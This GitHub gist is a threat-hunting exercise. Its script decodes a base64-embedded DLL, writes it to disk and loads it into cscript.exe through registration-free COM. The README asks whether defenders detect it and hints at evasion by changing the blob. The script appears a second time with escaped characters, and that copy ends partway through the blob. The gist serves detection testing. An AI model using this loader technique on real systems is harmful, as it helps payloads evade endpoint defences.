MHaggis/README.md

## README.md

      
    Raw
  

              README.md
            
          
    Instructions

The following script is designed to create artifacts that teams can use to hunt, new or interesting capabilities.
The following table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet
This script is self-contained.  It should dynamically write a DLL to disk and load it in to cscript.exe
To Invoke cscript.exe stranger_things.js
This example expects a 64bit system.
You can modify that if you wat ARM or x86 etc..
Ideas of what to hunt/test:

Did the anti-malware engine detect a malicious script
Did you observe the DLL written to disk?
Did you observe the DLL/ Module Load
What artifacts does this approach leave behind?
How might an attacker change this script to evade detection? hint : that 'base64 blob lol'


## stranger_things.js
var scriptdir = WScript.ScriptFullName.substring(0,WScript.ScriptFullName.lastIndexOf(WScript.ScriptName)-1)
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = scriptdir;


// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters.charAt(A)+Base64.characters.charAt(o)+Base64.characters.charAt(B)}while(c<a.length);return r}};
//Magic is just a cool way to decode to byte array ;
function Magic(r){if(!/^[a-z0-9+/]+={0,2}$/i.test(r)||r.length%4!=0)throw Error("Not base64 string");for(var t,e,n,o,i,a,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",h=[],d=0;d<r.length;d+=4)t=(a=f.indexOf(r.charAt(d))<<18|f.indexOf(r.charAt(d+1))<<12|(o=f.indexOf(r.charAt(d+2)))<<6|(i=f.indexOf(r.charAt(d+3))))>>>16&255,e=a>>>8&255,n=255&a,h[d/4]=String.fromCharCode(t,e,n),64==i&&(h[d/4]=String.fromCharCode(t,e)),64==o&&(h[d/4]=String.fromCharCode(t));return r=h.join("")}
function binaryWriter(res,filename)
{var base64decoded=Magic(res);var TextStream=new ActiveXObject('ADODB.Stream');TextStream.Type=2;TextStream.charSet='iso-8859-1';TextStream.Open();TextStream.WriteText(base64decoded);var BinaryStream=new ActiveXObject('ADODB.Stream');BinaryStream.Type=1;BinaryStream.Open();TextStream.Position=0;TextStream.CopyTo(BinaryStream);BinaryStream.SaveToFile(filename,2);BinaryStream.Close()}
// x64 dynwrapx.dll v 2.2.0 http://dynwrapx.script-coding.com/dwx/pages/dynwrapx.php?lang=en
var dynwrapX = 'T' +'V'+ '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ArAJEAQwAjAIgAQwAbAIIAYwArALsAYwAjAOUAgwAbAIIAgwAzAO4AgwArAPcAgwA7ACEB4AAbAIIAAAEbAIIABQBKAQkASgEVAEoBGQBKAX4BgwGHAY8BBIAAAAAAAAAAAAAAAAAAAAAAowMAAAQAAAAAAAAAAAAAAHkA4gIAAAAABAAAAAAAAAAAAAAAeQBEAQAAAAAAAAAAADxNb2R1bGU+AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUALmN0b3IAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAQ29tVmlzaWJsZUF0dHJpYnV0ZQBJbnRlcmZhY2VUeXBlQXR0cmlidXRlAENvbUludGVyZmFjZVR5cGUAR3VpZEF0dHJpYnV0ZQBTeXN0ZW0AR3VpZABNYXJzaGFsQnlSZWZPYmplY3QAQ2xhc3NJbnRlcmZhY2VBdHRyaWJ1dGUAQ2xhc3NJbnRlcmZhY2VUeXBlAFByb2dJZEF0dHJpYnV0ZQBTdHJpbmcAb3BfRXF1YWxpdHkAU3lzdGVtLldpbmRvd3MuRm9ybXMARGlhbG9nUmVzdWx0AE1lc3NhZ2VCb3gAU2hvdwBJbnRQdHIAWmVybwBQYXJzZQBDb21wYXJlVG8ATWFyc2hhbABHZXRJVW5rbm93bkZvck9iamVjdABRdWVyeUludGVyZmFjZQBPYmplY3QAQXBwRG9tYWluU2V0dXAAU3lzdGVtLlNlY3VyaXR5LlBvbGljeQBFdmlkZW5jZQBBcHBEb21haW4AVHlwZQBFbnZpcm9ubWVudABHZXRFbnZpcm9ubWVudFZhcmlhYmxlAHNldF9BcHBsaWNhdGlvbkJhc2UAZ2V0X0N1cnJlbnREb21haW4AZ2V0X0V2aWRlbmNlAENyZWF0ZURvbWFpbgBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseQBnZXRfQXNzZW1ibHkAZ2V0X0Z1bGxOYW1lAENyZWF0ZUluc3RhbmNlQW5kVW53cmFwAGV4cG9ydC5kbGwAbXNjb3JsaW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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAorKCsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';

binaryWriter(dynwrapX,scriptdir+"\\export.dll");


// You could add a way to drop this dynamically
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="Export" version="0.0.0.0"/> 	<file name="Export.dll"> 	<comClass  description="Export Class" clsid="{185FAAFF-9A8A-41B4-809A-CA6EEAA95D61}" threadingModel="Both" progid="DynamicWrapperDotNet"/> 	</file>  </assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
ax.ManifestText = manifest;

var mdo = ax.CreateObject("DynamicWrapperDotNet");
var s = mdo.getValue1("a");
WScript.StdOut.WriteLine(s);
var t = mdo.getValue1("b");
var s = mdo.getValue2();
mdo.getValue3();
WScript.StdOut.WriteLine(s);
WScript.StdOut.WriteLine(t);
	var scriptdir = WScript.ScriptFullName.substring(0,WScript.ScriptFullName.lastIndexOf(WScript.ScriptName)-1)
	new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = scriptdir;


	// Create Base64 Object, supports encode, decode
	var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e\|\|0)>>2&63,A=(3&e)<<4\|(t=t\|\|0)>>4&15,o=(15&t)<<2\|(h=h\|\|0)>>6&3,B=63&h;t?h\|\|(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters.charAt(A)+Base64.characters.charAt(o)+Base64.characters.charAt(B)}while(c<a.length);return r}};
	//Magic is just a cool way to decode to byte array ;
	function Magic(r){if(!/^[a-z0-9+/]+={0,2}$/i.test(r)\|\|r.length%4!=0)throw Error("Not base64 string");for(var t,e,n,o,i,a,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",h=[],d=0;d<r.length;d+=4)t=(a=f.indexOf(r.charAt(d))<<18\|f.indexOf(r.charAt(d+1))<<12\|(o=f.indexOf(r.charAt(d+2)))<<6\|(i=f.indexOf(r.charAt(d+3))))>>>16&255,e=a>>>8&255,n=255&a,h[d/4]=String.fromCharCode(t,e,n),64==i&&(h[d/4]=String.fromCharCode(t,e)),64==o&&(h[d/4]=String.fromCharCode(t));return r=h.join("")}
	function binaryWriter(res,filename)
	{var base64decoded=Magic(res);var TextStream=new ActiveXObject('ADODB.Stream');TextStream.Type=2;TextStream.charSet='iso-8859-1';TextStream.Open();TextStream.WriteText(base64decoded);var BinaryStream=new ActiveXObject('ADODB.Stream');BinaryStream.Type=1;BinaryStream.Open();TextStream.Position=0;TextStream.CopyTo(BinaryStream);BinaryStream.SaveToFile(filename,2);BinaryStream.Close()}
	// x64 dynwrapx.dll v 2.2.0 http://dynwrapx.script-coding.com/dwx/pages/dynwrapx.php?lang=en
	var dynwrapX = 'T' +'V'+ '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ArAJEAQwAjAIgAQwAbAIIAYwArALsAYwAjAOUAgwAbAIIAgwAzAO4AgwArAPcAgwA7ACEB4AAbAIIAAAEbAIIABQBKAQkASgEVAEoBGQBKAX4BgwGHAY8BBIAAAAAAAAAAAAAAAAAAAAAAowMAAAQAAAAAAAAAAAAAAHkA4gIAAAAABAAAAAAAAAAAAAAAeQBEAQAAAAAAAAAAADxNb2R1bGU+AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUALmN0b3IAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAQ29tVmlzaWJsZUF0dHJpYnV0ZQBJbnRlcmZhY2VUeXBlQXR0cmlidXRlAENvbUludGVyZmFjZVR5cGUAR3VpZEF0dHJpYnV0ZQBTeXN0ZW0AR3VpZABNYXJzaGFsQnlSZWZPYmplY3QAQ2xhc3NJbnRlcmZhY2VBdHRyaWJ1dGUAQ2xhc3NJbnRlcmZhY2VUeXBlAFByb2dJZEF0dHJpYnV0ZQBTdHJpbmcAb3BfRXF1YWxpdHkAU3lzdGVtLldpbmRvd3MuRm9ybXMARGlhbG9nUmVzdWx0AE1lc3NhZ2VCb3gAU2hvdwBJbnRQdHIAWmVybwBQYXJzZQBDb21wYXJlVG8ATWFyc2hhbABHZXRJVW5rbm93bkZvck9iamVjdABRdWVyeUludGVyZmFjZQBPYmplY3QAQXBwRG9tYWluU2V0dXAAU3lzdGVtLlNlY3VyaXR5LlBvbGljeQBFdmlkZW5jZQBBcHBEb21haW4AVHlwZQBFbnZpcm9ubWVudABHZXRFbnZpcm9ubWVudFZhcmlhYmxlAHNldF9BcHBsaWNhdGlvbkJhc2UAZ2V0X0N1cnJlbnREb21haW4AZ2V0X0V2aWRlbmNlAENyZWF0ZURvbWFpbgBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseQBnZXRfQXNzZW1ibHkAZ2V0X0Z1bGxOYW1lAENyZWF0ZUluc3RhbmNlQW5kVW53cmFwAGV4cG9ydC5kbGwAbXNjb3JsaW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